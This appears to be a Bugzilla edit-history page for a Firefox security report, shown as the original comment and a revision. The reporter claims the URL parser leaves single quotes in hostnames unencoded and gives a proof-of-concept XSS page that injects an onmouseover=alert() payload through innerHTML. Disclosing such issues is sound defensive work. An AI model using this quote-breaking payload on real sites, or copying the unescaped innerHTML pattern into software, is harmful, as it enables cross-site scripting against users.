Bug 1858119 Comment 0 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

Original comment by

ranjit pahan

on 2023-10-10 04:50:19 PDT

BUG
============
Improper validation of url cause major security issue

TESTED VERSION
===============
tested in FIREFOX browser windows and Linux  118.0.1 

DETAILS
===============
Firefox has built-in url parser "new URL" .
But it does not properly escape/encode single-qoute(') from url host part . So, this cause various secuirty vulnerability

try bellow command and see the result

```
new URL("http://example.com'/")
```
result

```
URL { href: "http://example.com'/", origin: "http://example.com'", protocol: "http:", username: "", password: "", host: "example.com'", hostname: "example.com'", port: "", pathname: "/", search: "" }
``` 
here see provided malicious url is http://example.com'/ and new URL() does not escape/encode single-qoutes(') from this url href,hostname,origin part


**here i found rfc . Host can only contain dot,alphanumeric and "-" .
https://www.rfc-editor.org/rfc/rfc3986.html Page-20
https://datatracker.ietf.org/doc/html/rfc1738  page 5
````
   defined in Section 3.5 of [RFC1034] and Section 2.1 of [RFC1123].
   Such a name consists of a sequence of domain labels separated by ".",
   each domain label starting and ending with an alphanumeric character
   and possibly also containing "-" characters.  The rightmost domain
   label of a fully qualified domain name in DNS may be followed by a
   single "." and should be if it is necessary to distinguish between
   the complete domain name and some local domain.
```

**i just checked all the modern browser like chrome, microsoft edge,opera,brave-browser,vivaldi,safari,yandex properly filter this payload .
they urlencode the single-quotes(') present in host part .
But it only exception for firefox browser .

here is sample code to make xss attack

```
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
<style>

</style>
</head>
<body>

<div id=aaa>
</div>

<script>
var u=new URL("http://example.com'/onmouseover=alert();//")
hh="<a href='"+u.href+"'>sddsf</a>"
document.getElementById("aaa").innerHTML=hh
</script>

</body>
</html>

```

host this page and open this page in browser and mouseover over the url to execute xss .

This is happening only becauses of single-quotes present in host part . this single-quote(') breaks the html context .

You should also urlencode the single-quote character present in host part just like all the other modern web-browser did .

Revision 1 by

:Gijs (he/him)

on 2023-10-10 05:28:35 PDT

BUG
============
Improper validation of url cause major security issue

TESTED VERSION
===============
tested in FIREFOX browser windows and Linux  118.0.1 

DETAILS
===============
Firefox has built-in url parser "new URL" .
But it does not properly escape/encode single-qoute(') from url host part . So, this cause various secuirty vulnerability

try bellow command and see the result

```
new URL("http://example.com'/")
```
result

```
URL { href: "http://example.com'/", origin: "http://example.com'", protocol: "http:", username: "", password: "", host: "example.com'", hostname: "example.com'", port: "", pathname: "/", search: "" }
``` 
here see provided malicious url is http://example.com'/ and new URL() does not escape/encode single-qoutes(') from this url href,hostname,origin part


**here i found rfc . Host can only contain dot,alphanumeric and "-" .
https://www.rfc-editor.org/rfc/rfc3986.html Page-20
https://datatracker.ietf.org/doc/html/rfc1738  page 5

```
   defined in Section 3.5 of [RFC1034] and Section 2.1 of [RFC1123].
   Such a name consists of a sequence of domain labels separated by ".",
   each domain label starting and ending with an alphanumeric character
   and possibly also containing "-" characters.  The rightmost domain
   label of a fully qualified domain name in DNS may be followed by a
   single "." and should be if it is necessary to distinguish between
   the complete domain name and some local domain.
```

**i just checked all the modern browser like chrome, microsoft edge,opera,brave-browser,vivaldi,safari,yandex properly filter this payload .
they urlencode the single-quotes(') present in host part .
But it only exception for firefox browser .

here is sample code to make xss attack

```
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
<style>

</style>
</head>
<body>

<div id=aaa>
</div>

<script>
var u=new URL("http://example.com'/onmouseover=alert();//")
hh="<a href='"+u.href+"'>sddsf</a>"
document.getElementById("aaa").innerHTML=hh
</script>

</body>
</html>

```

host this page and open this page in browser and mouseover over the url to execute xss .

This is happening only becauses of single-quotes present in host part . this single-quote(') breaks the html context .

You should also urlencode the single-quote character present in host part just like all the other modern web-browser did .

Back to Bug 1858119 Comment 0